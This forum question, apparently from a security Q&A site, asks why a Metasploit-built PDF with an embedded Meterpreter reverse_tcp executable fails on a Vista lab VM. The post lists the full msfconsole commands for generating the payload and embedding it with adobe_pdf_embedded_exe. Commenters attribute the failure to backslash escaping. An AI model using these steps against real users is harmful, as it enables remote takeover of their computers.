# The pdf embedded exe generating error on the target machine when executed

Tags: metasploit

These are the steps that I performed in order to generate a PDF embedded with exe.

**Attacker machine (Windows 7):**

```
msf > use windows/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set LHOST 192.168.0.102
msf payload(reverse_tcp) > generate -f C:\\Users\\User\\Desktop\\file.exe
msf payload(reverse_tcp) > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > set EXENAME C:\\Users\\User\\Desktop\\file.exe
msf exploit(adobe_pdf_embedded_exe) > set FILENAME file.pdf
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME C:\\Users\\User\\Downloads\\infile.pdf
msf exploit(adobe_pdf_embedded_exe) > exploit
```

I set up a handler and start listening for the reverse connection.

**Victim machine (Windows Vista Ultimate on VM):**

I am able to download the malicious pdf file. The launch message appears, but as soon as the execution of the payload starts (fires up a console on Vista), an error appears on the victim machine which says:

> Windows cannot find 'C:UsersUserDownloadsinfile.pdf'. Make sure you
>   typed the name correctly and try again.

The console exits without creating any reverse connection.

**Question:**

Is there any step that I'm missing or is it the problem with slashes in the file path which I entered in the metasploit framework?

Comment: Can you verify what the file is that you used for the `INFILENAME`? You know what that is for?

Comment: The INFILENAME in my case is itself "infile.pdf". As far as I know, it is the name of the file that will be used for embedding or injecting the exe file.

Comment: `infile.pd` is an old pdf file that was created using adobe 8.

Comment: Looks like a quoting problem. Maybe use double double {4} backslashes?